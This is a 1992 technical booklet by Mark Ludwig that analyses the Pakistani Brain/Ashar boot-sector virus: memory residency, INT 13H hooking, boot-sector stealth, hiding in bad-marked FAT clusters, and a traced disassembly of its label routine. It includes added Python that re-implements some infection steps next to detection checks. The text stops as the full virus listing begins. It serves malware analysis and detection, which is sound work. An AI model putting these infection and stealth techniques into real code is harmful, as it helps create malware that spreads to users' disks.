Technical Notes #1 A Disassembly of The Pakistani Brain / Ashar-B Virus By Mark A. Ludwig

Technical Notes #1 - pudn.comread.pudn.com/downloads165/sourcecode/asm/756887/tnote1.pdfmonitoring is accomplished by hooking the BIOS interrupt 13H, which is the BIOS disk/diskette


Technical Notes #1

A Disassembly of The Pakistani Brain /

Ashar-B Virus

By Mark A. Ludwig


© 1992 American Eagle Publications, Inc. All rights reserved. None of the contents of this booklet may be reproduced in any form without the prior written permission of American Eagle Publications, Inc. Executable code for the Brain is in the public domain.

For a free descriptive catalog of other interesting publications, write to:

American Eagle Publications, Inc.
Post Office Box 41401
Tucson, Arizona 85717

WARNING: This booklet contains complete source code for a live computer virus which could be extremely dangerous in the hands of incompetent persons. You could be held legally liable for the misuse of this virus, even if such misuse is unintentional. Do not attempt to execute any of the code in this booklet unless you are well versed in systems programming for personal computers, and you are working on a carefully controlled and isolated computer system. American Eagle Publications makes no warranty as to the safety of executing any code in this booklet, and no warranty that the code herein will function as described.


Contents

1. Introduction ... 1
2. Basic Functional Characteristics ... 1
3. How the Virus Hides in Memory ... 2
4. Disk Access When the Virus is Resident ... 3
5. How the Virus Infects a Disk ... 5
6. An Explanation of the Source Code ... 9
7. The Source Code ... 11
8. The Hex Listing ... 24
9. The Virus Loader ... 26
10. Notes on Variations ... 29
11. Detection and Disinfection ... 30
12. Bugs ... 31
13. References ... 32
14. Appendix A: The Hex Loader ... 32

Rev. 2


1. Introduction

This booklet contains a complete, commented disassembly of a popular version of the Pakistani Brain virus, known as the Pakistani Brain/Ashar B virus, along with a detailed description of how it works.

The Brain was introduced in 1986 by two brothers in Lahore, Pakistan. It was evidently placed on diskettes they distributed to discourage bootlegging of their software. (Perhaps this explains why the virus puts the infamous “(c) Brain” copyright notice in the disk label in such a way that it cannot be removed.) Of course, the virus didn’t discourage bootlegging. Instead, it has spread all around the world and become one of the most successful computer viruses in existence.

This particular version is known as the Ashar variant, and sometimes as the Shoe Virus since it contains the words “(c) ashar” and “VIRUS_SHOE RECORD” in it. This version is marked as “v9.0” although it is not the only version 9.0 around.

2. Basic Functional Characteristics

The Brain virus is a boot sector virus which infects only 360 Kilobyte floppy diskettes. This version cannot infect hard disks, 3 1/2" diskettes or 1.2 megabyte diskettes. It was obviously written for the old PC/XT environment. The version described here is also benign, and causes no intentional damage to a system it has infected. However, I have noticed that it will not function with all systems. Apparently it has an interrupt conflict with the BIOS upon boot-up on some systems, which causes the boot-up sequence to fail, leaving the machine in a hung state, rather than at an A: prompt. (This can easily be remedied, for experimental purposes, as described in Section 12.)

The Brain was not only one of the first computer viruses, but also the first “stealth” virus which attempted to fool the operating system into believing that the boot sector was not infected by redirecting all attempts to read Cylinder 0, Head 0, Sector 1 (where the real boot sector resides) to a pre-assigned location where the original boot sector had been stored by the virus. Thus all attempts to locate the virus in the boot sector on an infected system would find only the original boot sector, provided one did all disk access through the BIOS (and DOS, which uses the BIOS). In order to redirect attempts to read the boot sector, the virus installs itself in high DOS memory (at the top of the 640K limit), and hooks Interrupt 13H (Disk BIOS). It then filters every call to the BIOS from this interrupt.

The Pakistani Brain/Ashar Virus 1


Brain hides itself on disk by marking a group of clusters on the diskette as bad, and then it stores itself in that area. This technique protects the virus from being overwritten by all normal operating system file manipulation, since DOS normally ignores sectors marked bad and never attempts to read or write to them.

Brain plays one prank, which might be considered malicious: It changes (or adds) the disk label to a copyright notice “(c) Brain”. Since this copyright notice contains lower case letters, which DOS does not recognize, it cannot be removed from the directory without going in and directly editing the directory entry with a special software tool like PC Tools, Xtree or Norton. The LABEL command will simply fail to delete the old label on the disk, so “(c) Brain” will stay there.

These comments, of course, all refer to the version of Brain / Ashar described in this booklet. There are many hacked versions of the virus floating around, since it is fairly old, and it was a pretty good virus to start with. Some are quite able to infect a hard disk and different types of floppies, some are capable of doing damage, and some are just messed up versions put out by amateurs.

3. How the Virus Hides in Memory

When a disk containing the Brain is booted, the viral boot sector is loaded at memory location 0000:7C00H and executed. In that boot sector are pointers START_HEAD and START_SECCYL which tell the virus where to find the original boot sector and the rest of itself. Upon execution, the virus immediately loads the rest of its code into memory at 0000:7E00H, right above the viral boot sector.

Next, the viral boot sector moves the whole virus, including itself, to high memory. To go memory resident before DOS is resident, and to avoid being overwritten by DOS when it loads, the Brain uses a technique which has become fairly common among viruses: It examines the BIOS variable MEM_SIZE at 0040:0013H, which contains the number of kilobytes of base memory physically available in the system (up to 640K). Since DOS uses this variable to determine how much memory it should occupy, the virus can reserve some memory for itself by decrementing this variable. In so doing it stays completely outside the control of DOS. The Brain decrements MEM_SIZE by 7, thereby allowing itself 7K of memory.

Next, the Brain copies itself to this high memory area, and transfers control to itself there via a far return to offset 200H. Once the code in high memory is executing, it takes the interrupt 13H vector, as set up by the BIOS, and moves it to the vector for interrupt 6DH (labeled BDSK_INT in the disassembly here). The virus then installs its own interrupt 13H handler. It is only through an INT 13H that the virus is accessed once the boot process is complete. That, however, is a relatively frequent occurrence on a PC.

Finally, the Brain retrieves the original boot sector from where it was stored on the disk when the disk was infected. (The first sector of the hidden area, right before the main body of the virus.) It loads that boot sector into the usual location, 0000:7C00H, and executes it, allowing the boot sector to attempt to boot whatever operating system is on the disk. As DOS (or another operating system) boots, it checks MEM_SIZE to see how much memory it has to operate in, and makes the necessary adjustments. Since MEM_SIZE has already been adjusted by the virus, the operating system just happily makes room for the virus and goes about its business with no knowledge that the virus is present.
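The residency trick described in this section leaves two traces that can be checked from a snapshot of low memory: MEM_SIZE at 0040:0013H reads 7 less than the machine physically has, and the INT 13H vector points into that missing 7K, while the original BIOS vector sits at INT 6DH. The following is an added example, not code from the booklet: it parses a constructed image of the interrupt vector table and the start of the BIOS data area and flags that pattern. The ROM entry address F000:EC59 and the handler offset 02D3H are constructed values for the demonstration, not figures from the page.

```python
"""Added example (not from the booklet): detect the Section 3 residency pattern
from a snapshot of the first 2K of memory (vector table + start of the BDA).

Facts used from the page: MEM_SIZE is the word at 0040:0013H; the Brain lowers
it by 7; INT 13H is re-pointed to the virus and the BIOS vector moved to INT 6DH.
All segment/offset values in the sample snapshots are constructed."""
import struct

BDA_MEM_SIZE_ADDR = 0x0413   # 0040:0013H as a linear address
VIDEO_RAM_START = 0xA0000    # base memory ends here (640K)


def read_vector(low_mem: bytes, int_no: int):
    """Return (segment, offset) of interrupt int_no from the vector table at 0000:0000."""
    off, seg = struct.unpack_from("<HH", low_mem, int_no * 4)
    return seg, off


def linear(seg: int, off: int) -> int:
    return (seg << 4) + off


def mem_size_kb(low_mem: bytes) -> int:
    return struct.unpack_from("<H", low_mem, BDA_MEM_SIZE_ADDR)[0]


def check_int13_hook(low_mem: bytes, physical_kb: int = 640) -> dict:
    """Flag reported base memory below the physical amount together with an
    INT 13H handler living in the gap between the two."""
    kb = mem_size_kb(low_mem)
    seg, off = read_vector(low_mem, 0x13)
    target = linear(seg, off)
    top = min(physical_kb * 1024, VIDEO_RAM_START)
    in_gap = kb * 1024 <= target < top
    return {
        "mem_size_kb": kb,
        "missing_kb": physical_kb - kb,
        "int13_target": target,
        "int13_in_reserved_gap": in_gap,
    }


def build_snapshot(mem_kb: int, int13_seg: int, int13_off: int, int6d=None) -> bytes:
    """Constructed 2K image of 0000:0000-0000:07FF for the demonstration."""
    img = bytearray(0x800)
    struct.pack_into("<HH", img, 0x13 * 4, int13_off, int13_seg)
    if int6d is not None:
        struct.pack_into("<HH", img, 0x6D * 4, int6d[1], int6d[0])
    struct.pack_into("<H", img, BDA_MEM_SIZE_ADDR, mem_kb)
    return bytes(img)


# Clean machine: 640K reported, INT 13H in ROM (constructed address F000:EC59).
CLEAN = build_snapshot(640, 0xF000, 0xEC59)

# Infected: MEM_SIZE = 640 - 7 = 633, so the reserved block starts at
# 633 * 1024 = 9E400H, i.e. segment 9E40H. INT 13H now points into that
# block (offset 02D3H is constructed) and the ROM vector was copied to INT 6DH.
INFECTED = build_snapshot(633, 0x9E40, 0x02D3, int6d=(0xF000, 0xEC59))

if __name__ == "__main__":
    for name, snap in (("clean", CLEAN), ("infected", INFECTED)):
        print(name, check_int13_hook(snap), "int6d=%04X:%04X" % read_vector(snap, 0x6D))
```

On a real PC/XT the same check is what a user did by hand: CHKDSK reports 7K less than the machine has, and a vector dump shows INT 13H pointing just below the 640K line.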

4. Disk Access When the Virus is Resident

The Brain monitors all disk access once it is installed in memory. This monitoring is accomplished by hooking the BIOS interrupt 13H, which is the BIOS disk/diskette interrupt handler as described in Section 3. Every read and write to disk, every formatting operation, etc., is normally accomplished through this handler. The DOS file i/o functions, which operate at a much higher level, accomplish everything they do through multiple calls to interrupt 13H. For example, if a program asks to open a particular file and read it, DOS must use INT 13H to read the disk directory into memory and scan through it to find the file to open. Next, DOS uses the starting cluster number in the directory entry to calculate the absolute Cylinder, Head and Sector number where the file starts. It then uses INT 13H to begin reading the file. After the first cluster, DOS must read the FAT table, located at the beginning of the disk, to find subsequent clusters allocated to the file, translating them into Cylinder, Head, Sector locations and reading them one by one, all using INT 13H.

Fig. 1: The Brain in memory. (Diagram labels: ROM BIOS, Brain, DOS; INT 6DH vector, INT 13H vector; MEM_SIZE memory, actual base memory.)

Since a boot sector virus like Brain is loaded before DOS, it can hook interrupt 13H before DOS does, so every disk access from there on out is traced by the virus, be it high level accesses through DOS, or low level accesses directly through BIOS. The only way to circumvent this interrupt hook is to write a piece of software which directly interacts with the disk controller via the relevant i/o ports to read and write to the disk.

The Brain is a stealth virus because it attempts to hide itself from observation by a user poking around on a disk. The system employed by the Brain is fairly straightforward:

To protect the viral boot sector, part of Brain’s interrupt 13H hook looks for attempts to read it at Cylinder 0, Head 0, Sector 1. Any attempts to read this sector on an infected diskette are redirected to read the original boot sector from the area Brain reserved for itself when it infected the diskette being read. Thus, the virus’ boot sector, which resides at Cylinder 0, Head 0, Sector 1, is effectively blocked from being read via interrupt 13H. In the event that the diskette is not infected, the Brain will go infect the diskette, as described in Section 5, and then return the original boot sector to the caller.

To protect the main body of the virus, the Brain marks an area of the disk bad when it infects it. (See Section 5.) The main body of the virus, and the original boot sector are stored in this “bad” area. By marking an area bad, the Brain tells DOS never to read or write those sectors, effectively stopping inspection of these areas.

Using this strategy, the Brain insures that DOS will never overwrite it, and nothing will appear to be wrong with the disk. Bad sectors are a normal occurrence. And if the operating system or a utility program attempts to read the boot sector, one gets only the original boot sector.

5. How the Virus Infects a Diskette

This version of the Brain virus only infects 360 Kilobyte floppy diskettes. It cannot infect hard drives, and it will not infect other types of diskettes that it does not recognize.

The Brain infects a diskette from within an intercepted call to interrupt 13H. Generally, it will infect a disk under two circumstances:

1) An attempt is made to read the boot sector on an uninfected disk.
2) Four read operations are performed on the disk.

The second mode of infection appears to be a cover for unusual situations, as the boot sector is usually one of the first things read when a new disk is loaded. Both triggers use exactly the same routine to infect a diskette.

The first step in infecting a disk is to determine whether it has already been infected. To do this, the virus reads the actual boot sector using interrupt 6DH (which is the true BIOS disk interrupt when the virus is resident). The virus then looks for its signature, 1234H, at offset 5 in the boot sector. If found, the virus recognizes that the disk is already infected and goes on to handle the interrupt 13H, redirecting the read operation if necessary.

If the Brain’s signature is not present on a disk, the virus will attempt to infect the disk. The infection process is broken up into two main procedures, called INFECT_DISK and PUT_LABEL in this disassembly. The virus does a pretty good job checking for errors and handling them. PUT_LABEL is only called after INFECT_DISK has successfully put the virus on the disk. If INFECT_DISK encounters a problem at any point, it returns with the carry flag set, and PUT_LABEL is then skipped.

The infection process looks like this:

1) Make sure the disk is the 360K format.
2) Modify the FAT to allocate space to hide the virus.
3) Read the original boot sector from Cylinder 0, Head 0, Sector 1.
4) Write the original boot sector back to disk in the first sector of the hidden area.
5) Write the virus’ boot sector to Cylinder 0, Head 0, Sector 1.
6) Put the label “(c) Brain” on the disk.

Central to this infection process is the FAT modification. The Brain scans the disk to find some empty space where it can store itself, and then marks the FAT tables as bad in that location, so nothing else will overwrite that area. Then, the virus can safely store itself in this area.

To protect the main body of the virus, Brain marks the clusters where it resides as bad in both FAT tables on the disk. Normally, when a diskette is formatted, the FORMAT program verifies each cylinder as it is formatted. If it has any trouble verifying a cylinder, it marks the relevant clusters bad in the FAT table on the disk. DOS then avoids those clusters in every disk access. If it did not, the disk drive would hang up on those sectors every time something tried to access them, until the program accessing them timed out. This is an annoying sequence of events you may sometimes experience with a disk which has some bad sectors on it that went bad after it was formatted. Brain makes use of this feature of DOS to hide on the disk. After finding a blank area of the disk, it marks the relevant clusters bad in both FAT tables on the disk. Then it copies the main body of the virus out there.

On a 360K floppy, the FAT’s are two sectors long each, and they keep track of 355 clusters using 12 bit table entries. The first FAT begins in Cylinder 0, Head 0, Sector 2, and the second begins in Cylinder 0, Head 0, Sector 4. (They are always back-to-back.) The first byte in the FAT table tells the disk type. A 360K disk is identified with an FDH in this byte. When the Brain infects a disk, INFECT_DISK first calls MODIFY_FAT. This procedure reads both FAT’s into memory and checks the first two bytes. If that word is anything other than FFFDH, MODIFY_FAT returns control to INFECT_DISK and signals an error. The infection process is immediately stopped, so that disk will be left alone.

If the disk checks out, then MODIFY_FAT searches the disk for three consecutive free clusters (FAT entry 0) (1 cluster = 2 sectors = 1024 bytes). If it finds them, it marks them as bad by putting an FF7 in the three corresponding FAT entries (in both FAT’s). Although the operation of the FAT is detailed in a number of books, we will go over it here for completeness’ sake. Each entry in the FAT table corresponds to a cluster of two sectors on a 360K disk. Entries in the FAT form chains which, in conjunction with the directory entries, tell the operating system how to read files from the disk. FAT entries may take the following values:

Entry    Meaning
0        Empty cluster—no data is stored in this cluster.
1-355    Pointer to the next cluster in the chain. This cluster contains data, and it is not the last cluster in the file.
FF7      A bad cluster. DOS avoids this cluster and never attempts to read or write to it.
FFF      The last cluster in a chain. This cluster contains data, and it is the last cluster in the file.

A typical FAT table looks something like this:

0000  FD FF FF 03 40 00 05 60 00 FF 8F 00 09 A0 00 0B
0010  C0 00 0D E0 00 0F 00 01 11 20 01 13 40 01 15 60
0020  01 17 80 01 19 A0 01 1B C0 01 1D E0 01 1F F0 FF
0030  00 00 00 00 00 00 00 00 F7 7F FF F7 7F FF F7 0F

Entry 0 and 1: Disk ID in first byte.
Entry 2: Pointer to entry 3.
Entry 3: Pointer to entry 4.
Entry 6: End of file mark.
Entry 7: (New file) Points to 8.
Row 0030: empty clusters (the zero bytes), then bad clusters (the F7 7F FF pattern).

Since the FAT entries are 12 bits each, reading and writing them is less than trivial. Entries are paired off, and take up 3 bytes per pair. Brain accomplishes this decoding using the procedures READ_FAT_ENTRY and WRITE_BAD_FAT. The third entry in the FAT table (entry number 2, starting in byte 3) is the first one that is actually used to store allocation data. It corresponds to the cluster stored in Cylinder 0, Head 1, Sector 4 on the 360K diskette. All the clusters are stored sequentially after the first. Thus one may compute the Cylinder/Head/Sector location of any cluster in a straightforward way. The Brain uses the routine COMP_HD_TRK_SEC to accomplish this.

Once Brain has found three consecutive free clusters on the disk and successfully marked them bad, it is ready to move itself there. First, it moves the original boot sector from its normal location (Cylinder 0, Head 0, Sector 1) to the first sector of the hidden area. Right after this, it writes five sectors of the main body of the Brain. Then it places the viral boot sector in Cylinder 0, Head 0, Sector 1. Note that before the viral boot sector is written to disk, the fields START_HEAD and START_SECCYL are modified to reflect the new Cylinder/Head/Sector of the original boot sector. This makes it possible for the viral boot sector to locate the hidden area on the newly infected disk when it is booted.

At this point, INFECT_DISK completes its operation. If the disk is booted, the Brain will load itself into memory. The final step in the infection process is to put the label “(c) Brain” on the disk. To do this, PUT_LABEL and WRITE_LABEL search the root directory to find either an existing label entry or an empty entry, and put “(c) Brain” there using an obtuse routine USE_DIR_ENTRY detailed in Section 6.
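The 12-bit packing, the FFFDH media check, the search for three free clusters, the FF7 marking and the cluster-to-Cylinder/Head/Sector arithmetic described above are small enough to write out in full. What follows is an added example in Python, not code from the booklet: it reproduces the decoding that READ_FAT_ENTRY, WRITE_BAD_FAT and COMP_HD_TRK_SEC perform, and then turns the same decoder round into a defender's check, listing every run of bad-marked clusters in a FAT so that an isolated three-cluster run can be picked out. The FAT image it operates on is constructed; the geometry (9 sectors per track, 2 heads, 2 sectors per cluster, data area starting at Cylinder 0, Head 1, Sector 4) is the 360K layout the page gives.

```python
"""Added example (not from the booklet): FAT12 helpers for a 360K diskette and a
bad-cluster-run scan built on them. The sample FAT is constructed inline."""

SECTORS_PER_TRACK = 9
HEADS = 2
SECTORS_PER_CLUSTER = 2
FIRST_DATA_SECTOR = 12   # boot (1) + two FATs (2+2) + root directory (7)
                         # = Cylinder 0, Head 1, Sector 4, the home of cluster 2
DATA_CLUSTERS = 354      # (720 - 12) / 2 data clusters; entries run 2..355
FAT_SIZE = 2 * 512       # each FAT is two sectors on a 360K disk
BAD_CLUSTER = 0xFF7


def fat12_get(fat, n: int) -> int:
    """READ_FAT_ENTRY: entries are 12 bits, two of them packed into 3 bytes."""
    off = n * 3 // 2
    if n & 1:
        return (fat[off] >> 4) | (fat[off + 1] << 4)
    return fat[off] | ((fat[off + 1] & 0x0F) << 8)


def fat12_set(fat: bytearray, n: int, value: int) -> None:
    """Write one 12-bit entry without disturbing its neighbour in the shared byte."""
    off = n * 3 // 2
    value &= 0xFFF
    if n & 1:
        fat[off] = (fat[off] & 0x0F) | ((value & 0x0F) << 4)
        fat[off + 1] = value >> 4
    else:
        fat[off] = value & 0xFF
        fat[off + 1] = (fat[off + 1] & 0xF0) | (value >> 8)


def is_360k(fat) -> bool:
    """MODIFY_FAT's first test: the word at the start of the FAT must be FFFDH
    (media byte FDH followed by FFH)."""
    return fat[0] == 0xFD and fat[1] == 0xFF


def find_free_run(fat, count: int = 3):
    """MODIFY_FAT's search: first cluster of `count` consecutive free entries, or None."""
    run = 0
    for n in range(2, DATA_CLUSTERS + 2):
        run = run + 1 if fat12_get(fat, n) == 0 else 0
        if run == count:
            return n - count + 1
    return None


def mark_bad(fat: bytearray, start: int, count: int = 3) -> None:
    """WRITE_BAD_FAT: stamp FF7 on the chosen entries (a real disk has two FATs;
    the same call would be applied to each copy)."""
    for n in range(start, start + count):
        fat12_set(fat, n, BAD_CLUSTER)


def cluster_to_chs(cluster: int):
    """COMP_HD_TRK_SEC for 360K geometry: (cylinder, head, sector), sector 1-based."""
    lba = FIRST_DATA_SECTOR + (cluster - 2) * SECTORS_PER_CLUSTER
    return (lba // (SECTORS_PER_TRACK * HEADS),
            (lba // SECTORS_PER_TRACK) % HEADS,
            lba % SECTORS_PER_TRACK + 1)


def bad_runs(fat):
    """Defender's view: (first_cluster, length) for every run of FF7 entries."""
    runs, start = [], None
    for n in range(2, DATA_CLUSTERS + 2):
        bad = fat12_get(fat, n) == BAD_CLUSTER
        if bad and start is None:
            start = n
        elif not bad and start is not None:
            runs.append((start, n - start))
            start = None
    if start is not None:
        runs.append((start, DATA_CLUSTERS + 2 - start))
    return runs


def suspicious_runs(fat, size: int = 3):
    """Runs of exactly `size` bad clusters: the footprint Section 5 describes.
    A short, isolated run in an otherwise clean FAT is worth a closer look."""
    return [r for r in bad_runs(fat) if r[1] == size]


def make_sample_fat() -> bytearray:
    """Constructed FAT: media byte FD, one file occupying 2->3->4->EOF, rest free."""
    fat = bytearray(FAT_SIZE)
    fat12_set(fat, 0, 0xFFD)
    fat12_set(fat, 1, 0xFFF)
    fat12_set(fat, 2, 3)
    fat12_set(fat, 3, 4)
    fat12_set(fat, 4, 0xFFF)
    return fat


if __name__ == "__main__":
    fat = make_sample_fat()
    start = find_free_run(fat)
    print("first free run of 3 starts at cluster", start, "=", cluster_to_chs(start))
    mark_bad(fat, start)
    print("bad runs after marking:", bad_runs(fat), "suspicious:", suspicious_runs(fat))
```

Run against the page's own dump, the same decoder gives entry 2 = 3, entry 3 = 4 and entry 6 = FFF, matching the legend under the table.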


Finding an appropriate directory entry is fairly easy. The root directory of a 360K disk is an array of 112 thirty-two byte entries starting at Cylinder 0, Head 0, Sector 6. The label contains only an 11 byte name field and an attribute byte set to “label” (= 8). These form the first 12 bytes of the 32 byte directory entry. So PUT_LABEL reads the directory into memory, and WRITE_LABEL searches for an entry in which either byte 0 is 0 (blank entry/end of directory) or byte 11 is 8 (existing label). When either condition occurs, WRITE_LABEL passes control to USE_DIR_ENTRY which puts “(c) Brain” in that entry, and sets the attribute to a label.

Fig. 2: The Brain on disk.


6. An Explanation of the Source Code

For the most part, the source code is pretty straightforward. The boot routine (a) loads the main body of the virus, (b) reserves some memory, (c) moves itself to that memory, (d) hooks interrupt 13H, (e) installs the BIOS’ disk handler as interrupt 6DH, (f) loads the original boot sector, and (g) executes it, passing control to the operating system. The viral interrupt 13H handler looks for attempts to read the disk, redirecting reads of the boot sector, and infecting the disk when properly triggered. All of this is fairly easy to follow in the assembler comments in Section 7.

One section of the code demands some special attention: the routine which puts the label “(c) Brain” in the root directory. This is an extremely obtuse and confusing piece of code. What it has succeeded in doing is preserving the “(c) Brain” copyright notice, even though the virus has been hacked a large number of times. Though it seems like a hacker would be rather quick to change the label to read however he might fancy, this obtuse code has prevented all but the most serious from tearing it apart. So the “(c) Brain” label survived in this virus, even though it has been hacked from the original Brain, probably more than once.

Once the virus has successfully copied itself to a disk, it calls a routine which I call PUT_LABEL in the disassembly. PUT_LABEL calls WRITE_LABEL, and WRITE_LABEL jumps to USE_DIR_ENTRY. Although WRITE_LABEL has a few confusing things in it, you can figure it out with a little work, as long as you are sure those things aren’t just random trash—they’re all intentional. The fun really begins in USE_DIR_ENTRY. Here is that section of code, with its binary representation to the left:

B1 51        FUN_CODE: MOV  CL,51H                              ;1
81 C2 4C 44            ADD  DX,444CH         ;this is the code  ;2
BF 55 25               MOV  DI,2555H         ;used as data      ;3
B9 03 0C               MOV  CX,0C03H                            ;4
F3 A7                  REPZ CMPSW                               ;5
B8 46 0B               MOV  AX,0B46H                            ;6
B9 03 00               MOV  CX,0003H                            ;7
D3 C0                  ROL  AX,CL            ;AX=5A30H          ;8
                       MOV  TEMP_W3,AX       ;put it here       ;9
                                                                ;10
                       MOV  CX,5             ;loop counter = 5  ;11
                       MOV  DX,0008H         ;nonsense          ;12
                       SUB  TEMP_W3,5210H    ;TEMP_W3 = 0820H   ;13
                       PUSH TEMP_W3                             ;14
                       ;BX=OFFSET FUN_CODE                      ;15
             LP1:      MOV  AH,BYTE PTR [BX] ;get byte from code ;16
                       INC  BX               ;move pointer up   ;17
                       MOV  DL,AH            ;put it in ah      ;18
                       SHL  DL,1                                ;19
                       JB   LP1              ;if c, get another ;20
                                                                ;21
             LP2:      MOV  DL,BYTE PTR [BX] ;get another here  ;22
                       INC  BX               ;move pointer up   ;23
                       MOV  AL,DL            ;put it in al      ;24
                       SHL  DL,1                                ;25
                       JB   LP2              ;if c, get another ;26
                                                                ;27
                       ADD  AX,1D1DH         ;add 1D1D          ;28
                       PUSH AX               ;put in label      ;29
                       INC  WORD PTR TEMP_W3 ;clear c           ;30
                       JNB  LP3              ;always jump       ;31
                       DB   0EA              ;nonsense          ;32
             LP3:      LOOP LP1                                 ;33

This code uses the stack to push the proper characters into the necessary positions in the directory entry to form a label “(c) Brain” for the disk. It sets the stack up to point to the 12th byte of the directory entry where the label will go (in memory). The actual label is 11 bytes long, and the attribute byte is the 12th byte. (This attribute byte must be set to “label” by USE_DIR_ENTRY.)

Once the stack is set up, the fun begins. A few strange instructions which seem to have no bearing on anything are executed. When disassembling it, one is tempted to say “I’m lost,” and assume one is in the middle of a data area and not code. Not so. These instructions may not be doing anything very useful, but they’re not hurting anything either.

After the oddball instructions, we come to an interesting routine which uses the instructions just executed as data to create the disk label. First (line 14) TEMP_W3 gets set to 0820H, and pushed. That sets the attribute to 8, which indicates a disk label, and the last byte of the label to a space (20H). Next, the code loops 5 times to generate the other 10 bytes of the label (lines 16 to 33). The first time the label LP1 is reached, BX = OFFSET FUN_CODE. The byte pointed to by BX is loaded into AH, and shifted left once, the BX register is incremented, and if the left shift doesn’t carry, the byte is kept. Otherwise another byte is checked, until no carry is obtained. That completed, the same thing is done again, putting the byte in AL this time. Once two bytes are obtained, 1D1DH is added to AX, and AX is pushed. That makes it part of the label.

This process can be stepped through as follows:

LOCATION (IP)   BX        AH  AL  CARRY  CX  LABEL
LP1             FUN_CODE  B1      YES    5   _ _ _ _ _ _ _ _ _ _
                +1        51      NO
LP2             +2        51  81  YES
                +3            C2  YES
                +4            4C  NO
ADD AX,1D1DH    +5        6E  69
PUSH AX                                      _ _ _ _ _ _ _ _ i n
LP1             +5        44      NO     4
LP2             +6        44  BF  YES
                +7            55  NO
ADD AX,1D1DH    +8        61  72
PUSH AX                                      _ _ _ _ _ _ r a i n
LP1             +8        25      NO     3
LP2             +9        25  B9  YES
                +0A           03  NO
ADD AX,1D1DH    +0B       42  20
PUSH AX                                      _ _ _ _   B r a i n
LP1             +0B       0C      NO     2
LP2             +0C       0C  F3  YES
                +0D           A7  YES
                +0E           B8  YES
                +0F           46  NO
ADD AX,1D1DH    +10       29  63
PUSH AX                                      _ _ c )   B r a i n
LP1             +10       0B      NO     1
LP2             +11       0B  B9  YES
                +12           03  NO
ADD AX,1D1DH    +13       28  20
PUSH AX                                      ( c )   B r a i n

And there you have it, an incredibly obtuse piece of code that produces “(c) Brain” in the label!
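The trace above can be checked mechanically. The following is an added example, not code from the booklet: it re-implements the USE_DIR_ENTRY loop in Python over the opcode bytes printed beside lines 1 to 8 of the listing, producing the 12 bytes (11-byte name plus attribute) that end up in the directory entry, and it also implements the slot search WRITE_LABEL performs (byte 0 equal to 0, or byte 11 equal to 8) from Section 5. The root directory it operates on is constructed. Because the stack grows downward and PUSH stores the low byte first, the name comes out with the spaces where the trace shows them.

```python
"""Added example (not from the booklet): Python rendering of USE_DIR_ENTRY's
label generation, plus WRITE_LABEL's search for a directory slot and a
defender's check on the result. The root directory below is constructed."""

# Opcode bytes of lines 1-8 of the listing (MOV CL,51H ... ROL AX,CL), which the
# routine then reads back as data starting at FUN_CODE.
FUN_CODE = bytes.fromhex("B1 51 81 C2 4C 44 BF 55 25 B9 03 0C F3 A7 B8 46 0B B9 03 00 D3 C0")
LABEL_ATTR = 0x08
ENTRY_SIZE = 32


def next_plain_byte(code: bytes, bx: int):
    """LP1/LP2: skip bytes whose top bit is set (SHL DL,1 / JB), keep the first other one."""
    while True:
        b = code[bx]
        bx += 1
        if not b & 0x80:
            return b, bx


def rol16(value: int, count: int) -> int:
    count %= 16
    return ((value << count) | (value >> (16 - count))) & 0xFFFF


def build_label_entry(code: bytes = FUN_CODE) -> bytes:
    """Return the 12 bytes USE_DIR_ENTRY leaves in the directory entry."""
    temp_w3 = rol16(0x0B46, 3)                 # lines 6-8: AX = 5A30H (CL = 3 from line 7)
    temp_w3 = (temp_w3 - 0x5210) & 0xFFFF      # line 13: 0820H = attribute 08, last byte 20H
    pushes = [temp_w3]                          # line 14: first push, lands at the highest address
    bx = 0                                      # line 15: BX = OFFSET FUN_CODE
    for _ in range(5):                          # CX = 5 (line 11) ... LOOP LP1 (line 33)
        ah, bx = next_plain_byte(code, bx)      # lines 16-20
        al, bx = next_plain_byte(code, bx)      # lines 22-26
        ax = (((ah << 8) | al) + 0x1D1D) & 0xFFFF   # line 28
        pushes.append(ax)                       # line 29
    entry = b""
    for word in reversed(pushes):               # last push sits at the lowest address
        entry += bytes([word & 0xFF, word >> 8])    # PUSH stores the low byte first
    return entry


def find_label_slot(root_dir: bytes):
    """WRITE_LABEL: index of the first entry with byte 0 == 0 (blank/end of
    directory) or byte 11 == 8 (existing label); None if neither is found."""
    for i in range(0, len(root_dir), ENTRY_SIZE):
        e = root_dir[i:i + ENTRY_SIZE]
        if e[0] == 0 or e[11] == LABEL_ATTR:
            return i // ENTRY_SIZE
    return None


def apply_label(root_dir: bytes, entry12: bytes) -> bytes:
    """Place the 12 bytes in the slot WRITE_LABEL chooses (directory unchanged if none)."""
    slot = find_label_slot(root_dir)
    if slot is None:
        return root_dir
    d = bytearray(root_dir)
    d[slot * ENTRY_SIZE:slot * ENTRY_SIZE + 12] = entry12
    return bytes(d)


def has_lowercase_label(root_dir: bytes) -> bool:
    """Defender's check: the booklet notes DOS does not recognise lower-case
    letters in a label, so a label entry containing them was not written by
    LABEL and deserves a look at the boot sector."""
    for i in range(0, len(root_dir), ENTRY_SIZE):
        e = root_dir[i:i + ENTRY_SIZE]
        if e[0] == 0:
            break
        if e[11] == LABEL_ATTR and any(0x61 <= c <= 0x7A for c in e[:11]):
            return True
    return False


def make_root_dir() -> bytes:
    """Constructed 112-entry root directory holding two files and no label."""
    d = bytearray(112 * ENTRY_SIZE)
    for slot, name in enumerate((b"COMMAND COM", b"AUTOEXECBAT")):
        d[slot * ENTRY_SIZE:slot * ENTRY_SIZE + 11] = name
        d[slot * ENTRY_SIZE + 11] = 0x20       # archive attribute, not a label
    return bytes(d)


if __name__ == "__main__":
    entry = build_label_entry()
    print(entry[:11], "attribute=%02X" % entry[11])
    labelled = apply_label(make_root_dir(), entry)
    print("label slot:", find_label_slot(labelled), "lower-case label:", has_lowercase_label(labelled))
```

The name field decodes to eleven bytes with a leading space, “(c) Brain” and a trailing space, and byte 12 is 08H, exactly what the trace's final PUSH AX row shows once the blanks are filled in.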

7. The Source Code

Here is a complete assembly language listing of the Brain virus. It can be assembled using Turbo Assembler 2.0, Microsoft Assembler 5.0 or A86 3.0. This listing is provided for information purposes only. It is extremely infective. Do not experiment with it except in a carefully controlled computing environment. Format all floppy disks after experimenting!

;The Pakistani Brain Virus, Ashar 9.0 Version, or at least one variant of it.
;This is a complete, byte for byte disassembly. It may or may not produce an
;exact byte for byte copy of the virus, depending on which assembler you use,
;but it will be fully functional.

;This will assemble with TASM Version 2.0, MASM 5.0 or A86 Version 3.09 (and
;probably others). (C) Copyright 1992 by American Eagle Publications, Inc.

.RADIX 16

VIRUSEG         SEGMENT BYTE
